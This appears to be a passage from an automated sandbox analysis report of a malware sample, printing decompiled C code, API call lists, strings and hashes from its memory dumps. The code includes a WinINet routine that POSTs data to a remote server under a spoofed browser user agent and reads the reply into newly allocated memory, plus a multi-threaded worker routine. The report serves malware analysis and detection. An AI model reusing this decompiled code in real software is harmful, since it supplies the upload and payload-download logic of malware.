                                                                                                                                                                                                                                                                                          					_t117 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1644 = _t117;
                                                                                                                                                                                                                                                                                          					if(_v1644 == 0) {
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t119 = InternetConnectA(_v1644, _v1620, _v1612 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1640 = _t119;
                                                                                                                                                                                                                                                                                          					if(_v1640 == 0) {
                                                                                                                                                                                                                                                                                          						L36:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1644);
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t123 = HttpOpenRequestA(_v1640, "POST", _v1592, 0, 0,  &_v1576, 0x200300, 0); // executed
                                                                                                                                                                                                                                                                                          					_v1568 = _t123;
                                                                                                                                                                                                                                                                                          					if(_v1568 == 0) {
                                                                                                                                                                                                                                                                                          						L35:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1640);
                                                                                                                                                                                                                                                                                          						goto L36;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					wnsprintfA( &_v1300, 0x400, "Accept-Language: en-us\r\nContent-Type: application/octet-stream\r\nContent-Length: %d\r\n", _a12);
                                                                                                                                                                                                                                                                                          					_t196 = _t195 + 0x10;
                                                                                                                                                                                                                                                                                          					if(HttpAddRequestHeadersA(_v1568,  &_v1300, 0xffffffff, 0) == 0) {
                                                                                                                                                                                                                                                                                          						L34:
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v1568); // executed
                                                                                                                                                                                                                                                                                          						goto L35;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v1656 = 0x7530;
                                                                                                                                                                                                                                                                                          					if(_a28 > 0) {
                                                                                                                                                                                                                                                                                          						_v1656 = _a28;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					InternetSetOptionA(_v1568, 6,  &_v1656, 4);
                                                                                                                                                                                                                                                                                          					_v1652 = 1;
                                                                                                                                                                                                                                                                                          					_v1648 = 0;
                                                                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                                                                          						_v1920 = 0x100;
                                                                                                                                                                                                                                                                                          						E04007D20( &_v1916,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                          						_v1924 = 0;
                                                                                                                                                                                                                                                                                          						_t133 = HttpSendRequestA(_v1568, 0, 0, _a8, _a12); // executed
                                                                                                                                                                                                                                                                                          						if(_t133 == 0) {
                                                                                                                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 0x13,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                          							_t137 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                          							_v1936 = _t137;
                                                                                                                                                                                                                                                                                          							if(_a32 != 0) {
                                                                                                                                                                                                                                                                                          								_t137 = _a32;
                                                                                                                                                                                                                                                                                          								 *_a32 = _v1936;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						E04007D20(_t137,  &_v1916, 0, 0x100);
                                                                                                                                                                                                                                                                                          						_t196 = _t196 + 0xc;
                                                                                                                                                                                                                                                                                          						_v1928 = 0x500000;
                                                                                                                                                                                                                                                                                          						if(HttpQueryInfoA(_v1568, 5,  &_v1916,  &_v1920,  &_v1924) != 0) {
                                                                                                                                                                                                                                                                                          							_t151 = E04007DD0( &_v1916);
                                                                                                                                                                                                                                                                                          							_t196 = _t196 + 4;
                                                                                                                                                                                                                                                                                          							_v1940 = _t151;
                                                                                                                                                                                                                                                                                          							if(_v1940 > 0 && _v1940 < 0x40000000) {
                                                                                                                                                                                                                                                                                          								_v1928 = _v1940;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t143 = VirtualAlloc(0, _v1928, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v1932 = _t143;
                                                                                                                                                                                                                                                                                          						if(_v1932 == 0) {
                                                                                                                                                                                                                                                                                          							_v2976 = 0;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568,  &_v2972, 0x400,  &_v2976);
                                                                                                                                                                                                                                                                                          							} while (_v2976 > 0);
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_a16 = _v1932;
                                                                                                                                                                                                                                                                                          							 *_a20 = _v1928;
                                                                                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                                                                                          							_v1944 = _v1928;
                                                                                                                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                                                                                                                          								_v1948 = 0;
                                                                                                                                                                                                                                                                                          								InternetReadFile(_v1568, _v1932, _v1944,  &_v1948); // executed
                                                                                                                                                                                                                                                                                          								if(_a24 != 0) {
                                                                                                                                                                                                                                                                                          									 *_a24 =  *_a24 + _v1948;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v1948 == 0) {
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v1932 = _v1932 + _v1948;
                                                                                                                                                                                                                                                                                          								_v1944 = _v1944 - _v1948;
                                                                                                                                                                                                                                                                                          								if(_v1944 > 0) {
                                                                                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								L29:
                                                                                                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L29;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						L32:
                                                                                                                                                                                                                                                                                          						_v1648 = _v1648 + 1;
                                                                                                                                                                                                                                                                                          					} while (_v8 == 0 && _v1648 < 1);
                                                                                                                                                                                                                                                                                          					goto L34;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}










































                                                                                                                                                                                                                                                                                          0x04001849
                                                                                                                                                                                                                                                                                          0x04001854
                                                                                                                                                                                                                                                                                          0x04001c95
                                                                                                                                                                                                                                                                                          0x04001c9b
                                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                                          0x04001878
                                                                                                                                                                                                                                                                                          0x04001882
                                                                                                                                                                                                                                                                                          0x0400188c
                                                                                                                                                                                                                                                                                          0x04001896
                                                                                                                                                                                                                                                                                          0x040018a0
                                                                                                                                                                                                                                                                                          0x040018b5
                                                                                                                                                                                                                                                                                          0x040018ba
                                                                                                                                                                                                                                                                                          0x040018bd
                                                                                                                                                                                                                                                                                          0x040018cd
                                                                                                                                                                                                                                                                                          0x040018d3
                                                                                                                                                                                                                                                                                          0x040018e3
                                                                                                                                                                                                                                                                                          0x040018e9
                                                                                                                                                                                                                                                                                          0x04001902
                                                                                                                                                                                                                                                                                          0x0400190a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400191d
                                                                                                                                                                                                                                                                                          0x04001923
                                                                                                                                                                                                                                                                                          0x04001930
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001956
                                                                                                                                                                                                                                                                                          0x0400195c
                                                                                                                                                                                                                                                                                          0x04001969
                                                                                                                                                                                                                                                                                          0x04001c88
                                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c8f
                                                                                                                                                                                                                                                                                          0x04001994
                                                                                                                                                                                                                                                                                          0x0400199a
                                                                                                                                                                                                                                                                                          0x040019a7
                                                                                                                                                                                                                                                                                          0x04001c7b
                                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c82
                                                                                                                                                                                                                                                                                          0x040019c2
                                                                                                                                                                                                                                                                                          0x040019c8
                                                                                                                                                                                                                                                                                          0x040019e5
                                                                                                                                                                                                                                                                                          0x04001c6e
                                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c75
                                                                                                                                                                                                                                                                                          0x040019eb
                                                                                                                                                                                                                                                                                          0x040019f9
                                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                                          0x040019fe
                                                                                                                                                                                                                                                                                          0x04001a16
                                                                                                                                                                                                                                                                                          0x04001a1c
                                                                                                                                                                                                                                                                                          0x04001a26
                                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                                          0x04001a30
                                                                                                                                                                                                                                                                                          0x04001a48
                                                                                                                                                                                                                                                                                          0x04001a4d
                                                                                                                                                                                                                                                                                          0x04001a50
                                                                                                                                                                                                                                                                                          0x04001a6d
                                                                                                                                                                                                                                                                                          0x04001a75
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001aa1
                                                                                                                                                                                                                                                                                          0x04001aaa
                                                                                                                                                                                                                                                                                          0x04001aaf
                                                                                                                                                                                                                                                                                          0x04001ab2
                                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                                          0x04001abe
                                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                                          0x04001ac7
                                                                                                                                                                                                                                                                                          0x04001abc
                                                                                                                                                                                                                                                                                          0x04001ad7
                                                                                                                                                                                                                                                                                          0x04001adc
                                                                                                                                                                                                                                                                                          0x04001adf
                                                                                                                                                                                                                                                                                          0x04001b0f
                                                                                                                                                                                                                                                                                          0x04001b18
                                                                                                                                                                                                                                                                                          0x04001b1d
                                                                                                                                                                                                                                                                                          0x04001b20
                                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                                          0x04001b41
                                                                                                                                                                                                                                                                                          0x04001b2d
                                                                                                                                                                                                                                                                                          0x04001b57
                                                                                                                                                                                                                                                                                          0x04001b5d
                                                                                                                                                                                                                                                                                          0x04001b6a
                                                                                                                                                                                                                                                                                          0x04001c19
                                                                                                                                                                                                                                                                                          0x04001c23
                                                                                                                                                                                                                                                                                          0x04001c3d
                                                                                                                                                                                                                                                                                          0x04001c43
                                                                                                                                                                                                                                                                                          0x04001b70
                                                                                                                                                                                                                                                                                          0x04001b79
                                                                                                                                                                                                                                                                                          0x04001b84
                                                                                                                                                                                                                                                                                          0x04001b86
                                                                                                                                                                                                                                                                                          0x04001b93
                                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                                          0x04001b99
                                                                                                                                                                                                                                                                                          0x04001bbf
                                                                                                                                                                                                                                                                                          0x04001bc9
                                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                                          0x04001bd9
                                                                                                                                                                                                                                                                                          0x04001be2
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001bf2
                                                                                                                                                                                                                                                                                          0x04001c04
                                                                                                                                                                                                                                                                                          0x04001c11
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c15
                                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001c17
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001be4
                                                                                                                                                                                                                                                                                          0x04001c4c
                                                                                                                                                                                                                                                                                          0x04001c55
                                                                                                                                                                                                                                                                                          0x04001c5b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04001a30

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,0000003C), ref: 04001902
                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1),00000001,00000000,00000000,00000000), ref: 0400191D
                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04001956
                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,0400C2C8,00200300,00000000), ref: 04001994
                                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040019C2
                                                                                                                                                                                                                                                                                          • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,00000000), ref: 040019DD
                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,00000006,00007530,00000004), ref: 04001A16
                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 04001A6D
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001A99
                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000005,?,00000100,00000000), ref: 04001B07
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000004), ref: 04001B57
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,00000000,?,00000000), ref: 04001BBF
                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 04001C3D
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C75
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C82
                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 04001C8F
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d, xrefs: 040019B1
                                                                                                                                                                                                                                                                                          • <, xrefs: 040018BD
                                                                                                                                                                                                                                                                                          • POST, xrefs: 04001988
                                                                                                                                                                                                                                                                                          • 0u, xrefs: 040019EB
                                                                                                                                                                                                                                                                                          • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 04001918
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Internet$Http$CloseHandleRequest$FileInfoOpenQueryRead$AllocConnectCrackHeadersOptionSendVirtualwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: 0u$<$Accept-Language: en-usContent-Type: application/octet-streamContent-Length: %d$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)$POST
                                                                                                                                                                                                                                                                                          • API String ID: 880997049-2804282621
                                                                                                                                                                                                                                                                                          • Opcode ID: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                          • Instruction ID: 104ecec6680c69d5e391cf9d7718dbecb1b5f59d1f4ca396f8eadafade2250d2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9d4cb28da70c868705f456cd8ab0708f990bc07d580d9120d59bd3b3f766fdd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89C10BB19442189BFB64CF50CC49FD9B7B5EB88704F0481D9E60DAA2C0DB7AAAD4CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                                          				HANDLE* _v64;
                                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                                          				HANDLE* _v104;
                                                                                                                                                                                                                                                                                          				HANDLE* _v108;
                                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                                          				void* _t188;
                                                                                                                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                                          					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                                          					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                                          					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          					_v16 = _a24;
                                                                                                                                                                                                                                                                                          					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                                          					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                                          					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t198 = _v56;
                                                                                                                                                                                                                                                                                          						if(_v56 != 0) {
                                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						ResetEvent(_v20);
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                                          						_v56 = _t114;
                                                                                                                                                                                                                                                                                          						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                                          						_v64 = _v104;
                                                                                                                                                                                                                                                                                          						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                                          						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                                          						_v100 = 0;
                                                                                                                                                                                                                                                                                          						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                                          							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                                          							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                                          							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                                          							_v68 =  &_v56;
                                                                                                                                                                                                                                                                                          							_v72 = _a12;
                                                                                                                                                                                                                                                                                          							_v92 = _a4;
                                                                                                                                                                                                                                                                                          							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                                          							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                                          								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                          							_t141 = CreateThread(0, 0, E04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                                          							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                                          							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                                          							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                                          							_v5 = 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          						_v108 = _v64;
                                                                                                                                                                                                                                                                                          						E040097C0(_v108);
                                                                                                                                                                                                                                                                                          						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                                          						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                          							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x04004026
                                                                                                                                                                                                                                                                                          0x0400402e
                                                                                                                                                                                                                                                                                          0x0400405a
                                                                                                                                                                                                                                                                                          0x0400405f
                                                                                                                                                                                                                                                                                          0x04004066
                                                                                                                                                                                                                                                                                          0x0400406f
                                                                                                                                                                                                                                                                                          0x04004080
                                                                                                                                                                                                                                                                                          0x04004086
                                                                                                                                                                                                                                                                                          0x0400408a
                                                                                                                                                                                                                                                                                          0x0400408d
                                                                                                                                                                                                                                                                                          0x0400409f
                                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                                          0x040042bb
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
